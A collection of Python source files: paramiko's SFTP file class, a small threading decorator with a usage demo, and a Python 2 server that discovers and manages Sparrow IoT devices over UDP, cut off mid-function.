| source | python |
|---|---|
sftp_file.py
|
# Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
SFTP file object
"""
from __future__ import with_statement
from binascii import hexlify
from collections import deque
import socket
import threading
import time
from paramiko.common import DEBUG
from paramiko.file import BufferedFile
from paramiko.py3compat import long
from paramiko.sftp import CMD_CLOSE, CMD_READ, CMD_DATA, SFTPError, CMD_WRITE, \
CMD_STATUS, CMD_FSTAT, CMD_ATTRS, CMD_FSETSTAT, CMD_EXTENDED
from paramiko.sftp_attr import SFTPAttributes
class SFTPFile (BufferedFile):
"""
Proxy object for a file on the remote server, in client mode SFTP.
Instances of this class may be used as context managers in the same way
that built-in Python file objects are.
"""
# Some sftp servers will choke if you send read/write requests larger than
# this size.
MAX_REQUEST_SIZE = 32768
def __init__(self, sftp, handle, mode='r', bufsize=-1):
BufferedFile.__init__(self)
self.sftp = sftp
self.handle = handle
BufferedFile._set_mode(self, mode, bufsize)
self.pipelined = False
self._prefetching = False
self._prefetch_done = False
self._prefetch_data = {}
self._prefetch_extents = {}
self._prefetch_lock = threading.Lock()
self._saved_exception = None
self._reqs = deque()
def __del__(self):
self._close(async=True)
def close(self):
"""
Close the file.
"""
self._close(async=False)
def _close(self, async=False):
# We allow double-close without signaling an error, because real
# Python file objects do. However, we must protect against actually
# sending multiple CMD_CLOSE packets, because after we close our
# handle, the same handle may be re-allocated by the server, and we
# may end up mysteriously closing some random other file. (This is
# especially important because we unconditionally call close() from
# __del__.)
if self._closed:
return
self.sftp._log(DEBUG, 'close(%s)' % hexlify(self.handle))
if self.pipelined:
self.sftp._finish_responses(self)
BufferedFile.close(self)
try:
if async:
# GC'd file handle could be called from an arbitrary thread -- don't wait for a response
self.sftp._async_request(type(None), CMD_CLOSE, self.handle)
else:
self.sftp._request(CMD_CLOSE, self.handle)
except EOFError:
# may have outlived the Transport connection
pass
except (IOError, socket.error):
# may have outlived the Transport connection
pass
def _data_in_prefetch_requests(self, offset, size):
k = [x for x in list(self._prefetch_extents.values()) if x[0] <= offset]
if len(k) == 0:
return False
k.sort(key=lambda x: x[0])
buf_offset, buf_size = k[-1]
if buf_offset + buf_size <= offset:
# prefetch request ends before this one begins
return False
if buf_offset + buf_size >= offset + size:
# inclusive
return True
# well, we have part of the request. see if another chunk has the rest.
return self._data_in_prefetch_requests(buf_offset + buf_size, offset + size - buf_offset - buf_size)
def _data_in_prefetch_buffers(self, offset):
"""
if a block of data is present in the prefetch buffers, at the given
offset, return the offset of the relevant prefetch buffer. otherwise,
return None. this guarantees nothing about the number of bytes
collected in the prefetch buffer so far.
"""
k = [i for i in self._prefetch_data.keys() if i <= offset]
if len(k) == 0:
return None
index = max(k)
buf_offset = offset - index
if buf_offset >= len(self._prefetch_data[index]):
# it's not here
return None
return index
def _read_prefetch(self, size):
"""
read data out of the prefetch buffer, if possible. if the data isn't
in the buffer, return None. otherwise, behaves like a normal read.
"""
# while not closed, and haven't fetched past the current position, and haven't reached EOF...
while True:
offset = self._data_in_prefetch_buffers(self._realpos)
if offset is not None:
break
if self._prefetch_done or self._closed:
break
self.sftp._read_response()
self._check_exception()
if offset is None:
self._prefetching = False
return None
prefetch = self._prefetch_data[offset]
del self._prefetch_data[offset]
buf_offset = self._realpos - offset
if buf_offset > 0:
self._prefetch_data[offset] = prefetch[:buf_offset]
prefetch = prefetch[buf_offset:]
if size < len(prefetch):
self._prefetch_data[self._realpos + size] = prefetch[size:]
prefetch = prefetch[:size]
return prefetch
def _read(self, size):
size = min(size, self.MAX_REQUEST_SIZE)
if self._prefetching:
data = self._read_prefetch(size)
if data is not None:
return data
t, msg = self.sftp._request(CMD_READ, self.handle, long(self._realpos), int(size))
if t != CMD_DATA:
raise SFTPError('Expected data')
return msg.get_string()
def _write(self, data):
# may write less than requested if it would exceed max packet size
chunk = min(len(data), self.MAX_REQUEST_SIZE)
self._reqs.append(self.sftp._async_request(type(None), CMD_WRITE, self.handle, long(self._realpos), data[:chunk]))
if not self.pipelined or (len(self._reqs) > 100 and self.sftp.sock.recv_ready()):
while len(self._reqs):
req = self._reqs.popleft()
t, msg = self.sftp._read_response(req)
if t != CMD_STATUS:
raise SFTPError('Expected status')
# convert_status already called
return chunk
def settimeout(self, timeout):
"""
Set a timeout on read/write operations on the underlying socket or
ssh `.Channel`.
:param float timeout:
seconds to wait for a pending read/write operation before raising
``socket.timeout``, or ``None`` for no timeout
.. seealso:: `.Channel.settimeout`
"""
self.sftp.sock.settimeout(timeout)
def gettimeout(self):
"""
Returns the timeout in seconds (as a `float`) associated with the
socket or ssh `.Channel` used for this file.
.. seealso:: `.Channel.gettimeout`
"""
return self.sftp.sock.gettimeout()
def setblocking(self, blocking):
"""
Set blocking or non-blocking mode on the underlying socket or ssh
`.Channel`.
:param int blocking:
0 to set non-blocking mode; non-0 to set blocking mode.
.. seealso:: `.Channel.setblocking`
"""
self.sftp.sock.setblocking(blocking)
def seek(self, offset, whence=0):
self.flush()
if whence == self.SEEK_SET:
self._realpos = self._pos = offset
elif whence == self.SEEK_CUR:
self._pos += offset
self._realpos = self._pos
else:
self._realpos = self._pos = self._get_size() + offset
self._rbuffer = bytes()
def stat(self):
"""
Retrieve information about this file from the remote system. This is
exactly like `.SFTPClient.stat`, except that it operates on an
already-open file.
:return: an `.SFTPAttributes` object containing attributes about this file.
"""
t, msg = self.sftp._request(CMD_FSTAT, self.handle)
if t != CMD_ATTRS:
raise SFTPError('Expected attributes')
return SFTPAttributes._from_msg(msg)
def chmod(self, mode):
"""
Change the mode (permissions) of this file. The permissions are
unix-style and identical to those used by Python's `os.chmod`
function.
:param int mode: new permissions
"""
self.sftp._log(DEBUG, 'chmod(%s, %r)' % (hexlify(self.handle), mode))
attr = SFTPAttributes()
attr.st_mode = mode
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def chown(self, uid, gid):
"""
Change the owner (``uid``) and group (``gid``) of this file. As with
Python's `os.chown` function, you must pass both arguments, so if you
only want to change one, use `stat` first to retrieve the current
owner and group.
:param int uid: new owner's uid
:param int gid: new group id
"""
self.sftp._log(DEBUG, 'chown(%s, %r, %r)' % (hexlify(self.handle), uid, gid))
attr = SFTPAttributes()
attr.st_uid, attr.st_gid = uid, gid
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def utime(self, times):
"""
Set the access and modified times of this file. If
``times`` is ``None``, then the file's access and modified times are set
to the current time. Otherwise, ``times`` must be a 2-tuple of numbers,
of the form ``(atime, mtime)``, which is used to set the access and
modified times, respectively. This bizarre API is mimicked from Python
for the sake of consistency -- I apologize.
:param tuple times:
``None`` or a tuple of (access time, modified time) in standard
internet epoch time (seconds since 01 January 1970 GMT)
"""
if times is None:
times = (time.time(), time.time())
self.sftp._log(DEBUG, 'utime(%s, %r)' % (hexlify(self.handle), times))
attr = SFTPAttributes()
attr.st_atime, attr.st_mtime = times
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def truncate(self, size):
"""
Change the size of this file. This usually extends
or shrinks the size of the file, just like the ``truncate()`` method on
Python file objects.
:param size: the new size of the file
:type size: int or long
"""
self.sftp._log(DEBUG, 'truncate(%s, %r)' % (hexlify(self.handle), size))
attr = SFTPAttributes()
attr.st_size = size
self.sftp._request(CMD_FSETSTAT, self.handle, attr)
def check(self, hash_algorithm, offset=0, length=0, block_size=0):
"""
Ask the server for a hash of a section of this file. This can be used
to verify a successful upload or download, or for various rsync-like
operations.
The file is hashed from ``offset``, for ``length`` bytes. If ``length``
is 0, the remainder of the file is hashed. Thus, if both ``offset``
and ``length`` are zero, the entire file is hashed.
Normally, ``block_size`` will be 0 (the default), and this method will
return a byte string representing the requested hash (for example, a
string of length 16 for MD5, or 20 for SHA-1). If a non-zero
``block_size`` is given, each chunk of the file (from ``offset`` to
``offset + length``) of ``block_size`` bytes is computed as a separate
hash. The hash results are all concatenated and returned as a single
string.
For example, ``check('sha1', 0, 1024, 512)`` will return a string of
length 40. The first 20 bytes will be the SHA-1 of the first 512 bytes
of the file, and the last 20 bytes will be the SHA-1 of the next 512
bytes.
:param str hash_algorithm:
the name of the hash algorithm to use (normally ``"sha1"`` or
``"md5"``)
:param offset:
offset into the file to begin hashing (0 means to start from the
beginning)
:type offset: int or long
:param length:
number of bytes to hash (0 means continue to the end of the file)
:type length: int or long
:param int block_size:
number of bytes to hash per result (must not be less than 256; 0
means to compute only one hash of the entire segment)
:type block_size: int
:return:
`str` of bytes representing the hash of each block, concatenated
together
:raises IOError: if the server doesn't support the "check-file"
extension, or possibly doesn't support the hash algorithm
requested
.. note:: Many (most?) servers don't support this extension yet.
.. versionadded:: 1.4
"""
t, msg = self.sftp._request(CMD_EXTENDED, 'check-file', self.handle,
hash_algorithm, long(offset), long(length), block_size)
ext = msg.get_text()
alg = msg.get_text()
data = msg.get_remainder()
return data
def set_pipelined(self, pipelined=True):
"""
Turn on/off the pipelining of write operations to this file. When
pipelining is on, paramiko won't wait for the server response after
each write operation. Instead, they're collected as they come in. At
the first non-write operation (including `.close`), all remaining
server responses are collected. This means that if there was an error
with one of your later writes, an exception might be thrown from within
`.close` instead of `.write`.
By default, files are not pipelined.
:param bool pipelined:
``True`` if pipelining should be turned on for this file; ``False``
otherwise
.. versionadded:: 1.5
"""
self.pipelined = pipelined
def prefetch(self):
"""
Pre-fetch the remaining contents of this file in anticipation of future
`.read` calls. If reading the entire file, pre-fetching can
dramatically improve the download speed by avoiding roundtrip latency.
The file's contents are incrementally buffered in a background thread.
The prefetched data is stored in a buffer until read via the `.read`
method. Once data has been read, it's removed from the buffer. The
data may be read in a random order (using `.seek`); chunks of the
buffer that haven't been read will continue to be buffered.
.. versionadded:: 1.5.1
"""
size = self.stat().st_size
# queue up async reads for the rest of the file
chunks = []
n = self._realpos
while n < size:
chunk = min(self.MAX_REQUEST_SIZE, size - n)
chunks.append((n, chunk))
n += chunk
if len(chunks) > 0:
self._start_prefetch(chunks)
def readv(self, chunks):
"""
Read a set of blocks from the file by (offset, length). This is more
efficient than doing a series of `.seek` and `.read` calls, since the
prefetch machinery is used to retrieve all the requested blocks at
once.
:param chunks:
a list of (offset, length) tuples indicating which sections of the
file to read
:type chunks: list(tuple(long, int))
:return: a list of blocks read, in the same order as in ``chunks``
.. versionadded:: 1.5.4
"""
self.sftp._log(DEBUG, 'readv(%s, %r)' % (hexlify(self.handle), chunks))
read_chunks = []
for offset, size in chunks:
# don't fetch data that's already in the prefetch buffer
if self._data_in_prefetch_buffers(offset) or self._data_in_prefetch_requests(offset, size):
continue
# break up anything larger than the max read size
while size > 0:
chunk_size = min(size, self.MAX_REQUEST_SIZE)
read_chunks.append((offset, chunk_size))
offset += chunk_size
size -= chunk_size
self._start_prefetch(read_chunks)
# now we can just devolve to a bunch of read()s :)
for x in chunks:
self.seek(x[0])
yield self.read(x[1])
### internals...
def _get_size(self):
try:
return self.stat().st_size
except:
return 0
def _start_prefetch(self, chunks):
self._prefetching = True
self._prefetch_done = False
t = threading.Thread(target=self._prefetch_thread, args=(chunks,))
t.setDaemon(True)
t.start()
def _prefetch_thread(self, chunks):
# do these read requests in a temporary thread because there may be
# a lot of them, so it may block.
for offset, length in chunks:
with self._prefetch_lock:
num = self.sftp._async_request(self, CMD_READ, self.handle, long(offset), int(length))
self._prefetch_extents[num] = (offset, length)
def _async_response(self, t, msg, num):
if t == CMD_STATUS:
# save exception and re-raise it on next file operation
try:
self.sftp._convert_status(msg)
except Exception as e:
self._saved_exception = e
return
if t != CMD_DATA:
raise SFTPError('Expected data')
data = msg.get_string()
with self._prefetch_lock:
offset, length = self._prefetch_extents[num]
self._prefetch_data[offset] = data
del self._prefetch_extents[num]
if len(self._prefetch_extents) == 0:
self._prefetch_done = True
def _check_exception(self):
"""if there's a saved exception, raise & clear it"""
if self._saved_exception is not None:
x = self._saved_exception
self._saved_exception = None
raise x
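# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# Assuming an already-connected paramiko.SFTPClient instance named `sftp`
# (connection setup omitted), prefetch(), readv() and set_pipelined() are
# typically used like this:
#
#   with sftp.open('remote.bin', 'rb') as f:
#       f.prefetch()                 # queue async reads for the rest of the file
#       data = f.read()              # reads are now served from the prefetch buffers
#
#   with sftp.open('remote.bin', 'rb') as f:
#       blocks = list(f.readv([(0, 1024), (65536, 1024)]))   # scattered reads, issued at once
#
#   with sftp.open('upload.bin', 'wb') as f:
#       f.set_pipelined(True)        # don't wait for a server ack after each write
#       f.write(data)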
|
decorators.py
|
from threading import Thread
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
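# Illustrative usage (a sketch added for clarity; not part of the original file).
# Note that `async` became a reserved keyword in Python 3.7, so this decorator
# (and the demo below) only runs on older interpreters; on modern Python the
# decorator would need a different name such as `run_async`.
if __name__ == "__main__":
    import time

    @async
    def slow_greeting(name):
        time.sleep(1)
        print("hello, %s" % name)

    slow_greeting("world")   # returns immediately; the greeting prints ~1s later
    print("main thread is not blocked")
    time.sleep(2)            # give the worker thread time to finish before exiting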
|
deviceserver.py
|
#!/usr/bin/env python
#
# Copyright (c) 2015-2016, Yanzi Networks AB.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holders nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# Author: Joakim Eriksson, joakime@sics.se
# Niclas Finne, nfi@sics.se
#
# Grab devices using Sparrow Application Layer and keep them in the network
#
import tlvlib, nstatslib, sys, struct, binascii, socket, time, threading
import subprocess, re, dscli, logging
EVENT_DISCOVERY = "discovery"
EVENT_BUTTON = "button"
EVENT_MOTION = "motion"
EVENT_NSTATS_RPL = "nstats-rpl"
class EndPoint:
sock = None
host = None
port = None
def __init__(self, sock, host, port=tlvlib.UDP_PORT):
self.sock = sock
self.host = host
self.port = port
def sendto(self, data):
self.sock.sendto(data, (self.host, self.port))
def __str__(self):
return "EndPoint(" + `self.sock` + "," + `self.host` + "," + `self.port` + ")"
class Device:
endpoint = None
product_type = None
device_info = None
label = 'unknown'
boot_time = 0
address = ""
log = None
button_instance = None
button_counter = None
leds_instance = None
lamp_instance = None
temperature_instance = None
nstats_instance = None
sleep_instance = None
motion_instance = None
motion_counter = None
nstats_rpl = None
next_fetch = 0
fetch_tries = 0
next_update = 0
update_tries = 0
discovery_tries = 0
_discovery_lock = False
_outgoing = None
_outgoing_callbacks = None
_pending_outgoing = False
def __init__(self, device_address, device_endpoint, device_server):
self.endpoint = device_endpoint
self.address = device_address
self._device_server = device_server
self.last_seen = 0
self.last_ping = 0
self.log = logging.getLogger(device_address)
def is_discovered(self):
return self.product_type is not None
def is_sleepy_device(self):
return self._outgoing is not None
def set_sleepy_device(self):
if self._outgoing is None:
self._outgoing = []
def get_instance(self, instance_type):
if self.device_info:
i = 1
for data in self.device_info[1]:
if data[0] == instance_type:
return i
i += 1
return None
def has_pending_tlv(self, tlv):
if self._outgoing is None:
return False
if type(tlv) == list:
for t in tlv:
if self.has_pending_tlv(t):
return True
else:
for t in self._outgoing:
if t.instance == tlv.instance and t.variable == tlv.variable and t.op == tlv.op and t.element_size == tlv.element_size and t.length == tlv.length:
return True
return False
def send_tlv(self, tlv, callback = None):
if callback:
if self._outgoing_callbacks:
self._outgoing_callbacks.append(callback)
else:
self._outgoing_callbacks = [callback]
if self._outgoing is None:
return self._send_immediately(tlv)
if type(tlv) == list:
self._outgoing += tlv
else:
self._outgoing.append(tlv)
return True
def get_pending_packet_count(self):
if self._outgoing:
return len(self._outgoing)
return 0
def _flush(self):
if self._outgoing is not None and len(self._outgoing) > 0:
self.log.debug("FLUSH %s",tlvlib.get_tlv_short_info(self._outgoing))
tlvs = self._outgoing
self._outgoing = []
self._send_immediately(tlvs)
def _send_immediately(self, tlv):
self._pending_outgoing = True
data = tlvlib.create_encap(tlv)
self.endpoint.sendto(data)
return True
def _process_tlvs(self, tlvs):
self.last_seen = time.time();
for tlv in tlvs:
if tlv.error != 0:
# TLV errors have already been printed when received
if tlv.instance == 0:
if tlv.variable == tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG:
self.log.warning("Failed to update WDT - trying to grab!")
self._device_server.grab_device(self)
elif tlv.op & 0x7f == tlvlib.TLV_GET_RESPONSE:
self._process_get_response(tlv)
elif tlv.op & 0x7f == tlvlib.TLV_EVENT_RESPONSE:
self._process_get_response(tlv)
# TODO handle other types
if self._pending_outgoing:
self._pending_outgoing = False
if self._outgoing_callbacks:
callbacks = self._outgoing_callbacks
self._outgoing_callbacks = None
for callback in callbacks[:]:
try:
callback(self, tlvs)
except Exception as e:
self.log.error("*** TLV callback error: %s", str(e))
def _process_get_response(self, tlv):
if tlv.instance == 0:
if tlv.variable == tlvlib.VARIABLE_UNIT_BOOT_TIMER:
# Update the boot time estimation
seconds,ns = tlvlib.convert_ieee64_time(tlv.int_value)
last_boot_time = self.boot_time
self.boot_time = self.last_seen - seconds
# Assume a reboot if the boot time moved back by at least 30 seconds
if last_boot_time - self.boot_time > 30:
self.log.info("REBOOT DETECTED!")
elif tlv.variable == tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG:
if self.next_update < 0:
# Ignore watchdog in this device
pass
elif hasattr(tlv, 'int_value') and tlv.int_value > 0:
self.log.debug("WDT updated! %d seconds remaining",
tlv.int_value)
self.next_update = self.last_seen + tlv.int_value - self._device_server.guard_time
self.update_tries = 0
else:
# Need to refresh watchdog
t1 = tlvlib.create_set_tlv32(0, tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG,
self._device_server.watchdog_time)
self.send_tlv(t1)
elif tlv.variable == tlvlib.VARIABLE_SLEEP_DEFAULT_AWAKE_TIME:
# This node is a sleepy node
self.set_sleepy_device()
elif self.button_instance and tlv.instance == self.button_instance:
if tlv.variable == tlvlib.VARIABLE_GPIO_TRIGGER_COUNTER:
self.button_counter = tlv.int_value
elif tlv.variable == tlvlib.VARIABLE_EVENT_ARRAY and tlv.op == tlvlib.TLV_EVENT_RESPONSE:
self.log.info("button pressed - %d times",self.button_counter)
# Rearm the button
self.arm_device(self.button_instance)
de = DeviceEvent(self, EVENT_BUTTON, self.button_counter)
self._device_server.send_event(de)
elif self.motion_instance and tlv.instance == self.motion_instance:
if tlv.variable == 0x100:
self.motion_counter, = struct.unpack("!q", tlv.data[8:16])
elif tlv.variable == tlvlib.VARIABLE_EVENT_ARRAY and tlv.op == tlvlib.TLV_EVENT_RESPONSE:
self.log.info("MOTION! - %d times",self.motion_counter)
# Rearm the motion detector
self.arm_device(self.motion_instance)
de = DeviceEvent(self, EVENT_MOTION, self.motion_counter)
self._device_server.send_event(de)
elif self.nstats_instance and tlv.instance == self.nstats_instance:
if tlv.variable == tlvlib.VARIABLE_NSTATS_DATA:
self._handle_nstats(tlv)
elif self.temperature_instance and tlv.instance == self.temperature_instance:
if tlv.variable == tlvlib.VARIABLE_TEMPERATURE:
temperature = (tlv.int_value - 273150) / 1000.0
self.log.info("Temperature: " + str(round(temperature, 2)) + " C")
def _handle_nstats(self, tlv):
if tlv.error != 0:
return
nstats = nstatslib.Nstats(tlv.value)
if not nstats:
return
rpl = nstats.get_data_by_type(nstatslib.NSTATS_TYPE_RPL)
if not rpl:
return
self.nstats_rpl = rpl
de = DeviceEvent(self, EVENT_NSTATS_RPL, rpl)
self._device_server.send_event(de)
def arm_device(self, instances):
tlvs = [tlvlib.create_set_vector_tlv(0, tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 1,
struct.pack("!L", 1))]
if type(instances) == list:
for i in instances:
t = tlvlib.create_set_vector_tlv(i, tlvlib.VARIABLE_EVENT_ARRAY,
0, 0, 2,
struct.pack("!LL", 1, 2))
tlvs.append(t)
else:
t = tlvlib.create_set_vector_tlv(instances,
tlvlib.VARIABLE_EVENT_ARRAY, 0, 0, 2,
struct.pack("!LL", 1, 2))
tlvs.append(t)
if not self.send_tlv(tlvs):
log.warning("Failed to arm device!")
def info(self):
info = " " + self.address + "\t"
if self.is_discovered():
info += "0x%016x"%self.product_type
if self.is_sleepy_device():
info += "\t[sleepy]"
return info
def __str__(self):
return "Device(" + self.address + " , " + str(self.is_sleepy_device()) + ")"
# DeviceEvent used for different callbacks
class DeviceEvent:
def __init__(self, device = None, event_type = None, event_data = None):
self.device = device
self.event_type = event_type
self.event_data = event_data
def __str__(self):
addr = None
if self.device:
addr = self.device.address
return "DeviceEvent(" + `addr` + "," + `self.event_type` + "," + `self.event_data` + ")"
class DeviceServer:
_sock = None
_sock4 = None
running = True
device_server_host = None
router_host = "localhost"
router_address = None
router_prefix = None
router_instance = None
brm_instance = None
nstats_instance = None
radio_instance = None
radio_channel = 26
radio_panid = 0xabcd
udp_address = "aaaa::1"
udp_port = 4444
# The open range is 7000 - 7999
# This is what is announced in the beacon
location = 7000
# This is what is set when grabbing the node
grab_location = 0
# watchdog time in seconds
watchdog_time = 1200
guard_time = 300
# Try to grab any device it hears
grab_all = 0
_accept_nodes = None
fetch_time = 120
def __init__(self):
self._devices = {}
self._callbacks = []
self.log = logging.getLogger("server")
def send_event(self, device_event):
# print "Sending event:", device_event
for callback in self._callbacks[:]:
# print "Callback to:", callback
try:
callback(device_event)
except Exception as e:
self.error("*** callback error: %s", str(e))
def add_event_listener(self, callback):
self._callbacks.append(callback)
def remove_event_listener(self, callback):
self._callbacks.remove(callback)
# 24-bit reserved, 8-bit type = 02
# 16-bit reserved, 16-bit port
# 16-byte IPv6 address
# 4-byte location ID
# 4-byte reserved
def grab_device(self, target):
# Do not try to grab targets that should not be grabbed
if hasattr(target, 'next_update') and target.next_update < 0:
return False
IPv6Str = binascii.hexlify(socket.inet_pton(socket.AF_INET6, self.udp_address))
payloadStr = "000000020000%04x"%self.udp_port + IPv6Str + "%08x"%self.grab_location + "00000000"
payload = binascii.unhexlify(payloadStr)
self.log.info("[%s] Grabbing device => %s (%s)", target, payloadStr, str(len(payload)))
t1 = tlvlib.create_set_tlv(0, tlvlib.VARIABLE_UNIT_CONTROLLER_ADDRESS, 3,
payload)
t2 = tlvlib.create_set_tlv32(0, tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG,
self.watchdog_time)
if hasattr(target, 'send_tlv'):
if target.has_pending_tlv(t2):
self.log.info("[%s] Already has pending grab request", target.address)
return False
if not target.send_tlv([t1,t2]):
self.log.info("[%s] Failed to grab device (time out)", target.address)
return False
return True
try:
tlvlib.send_tlv([t1,t2], target)
return True
except socket.timeout:
self.log.warning("[%s] Failed to grab device (time out)", str(target))
return False
def set_location(self, address, location):
self.log.debug("[%s] Setting location to %d", address, location)
t = tlvlib.create_set_tlv32(0, tlvlib.VARIABLE_LOCATION_ID, location)
enc,tlvs = tlvlib.send_tlv(t, address)
return tlvs
def discover_device(self, dev):
if dev._discovery_lock:
return
dev._discovery_lock = True
dev.discovery_tries = dev.discovery_tries + 1
try:
dev.log.debug("trying to do TLV discover")
dev.device_info = tlvlib.discovery(dev.address)
dev.product_type = dev.device_info[0][1]
dev.label = dev.device_info[0][0]
print "\tFound: ", dev.device_info[0][0], " Product Type: 0x%016x"%dev.product_type
seconds,nanoseconds = tlvlib.convert_ieee64_time(dev.device_info[0][2])
dev.boot_time = time.time() - seconds
i = 1
for data in dev.device_info[1]:
if data[0] == tlvlib.INSTANCE_BUTTON_GENERIC:
dev.button_instance = i
elif data[0] == tlvlib.INSTANCE_MOTION_GENERIC:
dev.motion_instance = i
elif data[0] == tlvlib.INSTANCE_LEDS_GENERIC:
dev.leds_instance = i
elif data[0] == tlvlib.INSTANCE_LAMP:
dev.lamp_instance = i
elif data[0] == tlvlib.INSTANCE_TEMP_GENERIC:
dev.temperature_instance = i
elif data[0] == tlvlib.INSTANCE_TEMPHUM_GENERIC:
dev.temperature_instance = i
elif data[0] == tlvlib.INSTANCE_NETWORK_STATISTICS:
print "\tFound: Network Statistics"
dev.nstats_instance = i
elif data[0] == tlvlib.INSTANCE_SLEEP:
print "\tFound: Sleep instance"
dev.sleep_instance = i
dev.set_sleepy_device()
i += 1
if dev.next_update == 0:
if self.grab_device(dev):
dev.next_update = time.time() + self.watchdog_time - self.guard_time
if dev.button_instance:
print "\tFound: Button instance - arming device!"
dev.arm_device(dev.button_instance)
if dev.motion_instance:
print "\tFound: Motion instance - arming device!"
dev.arm_device(dev.motion_instance)
de = DeviceEvent(dev, EVENT_DISCOVERY)
self.send_event(de)
except Exception as e:
dev.log.error("discovery failed: %s", str(e))
dev._discovery_lock = False
def ping(self, dev):
dev.log.debug("Pinging to check liveness...")
p = subprocess.Popen(["ping6", "-c", "1", dev.address],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
while True:
line = p.stdout.readline()
if line == '': break
# print line
except Exception as e:
print e
dev.log.error("Ping Unexpected error: %s", str(sys.exc_info()[0]))
p.wait()
dev.last_ping = time.time()
if p.returncode == 0:
dev.last_seen = dev.last_ping
if p.returncode == None:
p.terminate()
# ----------------------------------------------------------------
# manage devices
# this maintains the devices - keeps them "grabbed" by updating the
# watchdog timer. Note: might need to keep an add/delete list to avoid
# messing with the same lists when devices need to be added/deleted.
# ----------------------------------------------------------------
def _manage_devices(self):
while self.running:
current_time = time.time()
remove_list = []
for dev in self.get_devices():
# Check if there is need for discovery
if not dev.is_discovered():
if dev.discovery_tries < 5:
self.discover_device(dev)
if not dev.is_discovered():
# Do a live check if needed...
if dev.last_seen + 60 < current_time and dev.last_ping + 60 < current_time:
self.ping(dev)
# Remove non-discoverable devices after some time
# so they can be tried again
if dev.last_seen + 180 < current_time:
print "Removing",dev.address,"last seen",(current_time - dev.last_seen),"seconds ago"
remove_list.append(dev)
continue
# Check if there is need for WDT update
if current_time > dev.next_update and dev.next_update >= 0:
dev.log.debug("UPDATING WDT!")
dev.update_tries += 1
if dev.update_tries > 20:
print "[" + dev.address + "] REMOVED due to",dev.update_tries,"WDT update retries"
remove_list.append(dev)
else:
t1 = tlvlib.create_set_tlv32(0, tlvlib.VARIABLE_UNIT_CONTROLLER_WATCHDOG, self.watchdog_time)
try:
# Retry every minute
dev.next_update = current_time + 60
dev.send_tlv(t1)
except Exception as e:
print "[" + dev.address + "] FAILED TO UPDATE WDT!"
print e
if current_time >= dev.next_fetch and dev.next_fetch >= 0:
dev.fetch_tries += 1
if self._fetch_periodic(dev):
dev.fetch_tries = 0
dev.next_fetch = time.time() + self.fetch_time
else:
print "*** failed to fetch from", dev.address,"("+str(dev.fetch_tries)+")"
# Try again a little later
dev.next_fetch = time.time() + 10 * dev.fetch_tries
for dev in remove_list:
self.remove_device(dev.address)
time.sleep(1)
def get_devices(self):
return list(self._devices.values())
def get_device(self, addr):
if addr in self._devices:
return self._devices[addr]
return None
# adds a device to the grabbed devices list
def _add_device(self, sock, addr, port=tlvlib.UDP_PORT):
d = self.get_device(addr)
if d is not None:
return d;
endpoint = EndPoint(sock, addr, port)
d = Device(addr, endpoint, self)
d.last_seen = time.time()
# to avoid pinging immediately
d.last_ping = d.last_seen
d.next_fetch = d.last_seen + self.fetch_time
d.log.debug("ADDED")
self._devices[addr] = d
return d
def add_device(self, addr, port=tlvlib.UDP_PORT):
self._add_device(self._sock, addr, port)
def remove_device(self, addr):
d = self.get_device(addr)
if d is not None:
del self._devices[addr]
d.log.debug("REMOVED")
def fetch_nstats(self):
t = threading.Thread(target=self._fetch_nstats)
t.daemon = True
t.start()
def _fetch_nstats(self):
for dev in self.get_devices():
if dev.nstats_instance:
# The device has the network instance
dev.log.debug("Requesting network statistics")
try:
t = nstatslib.create_nstats_tlv(dev.nstats_instance)
if not dev.send_tlv(t):
dev.log.debug("*** Failed to fetch network statistics")
except Exception as e:
dev.log.debug("**** Failed to fetch network statistics: %s", str(e))
time.sleep(0.5)
def _lookup_device_host(self, prefix, default_host):
try:
output = subprocess.check_output('ifconfig | grep inet6 | grep -v " fe80" | grep -v " ::1"', shell=True)
# Check prefix first
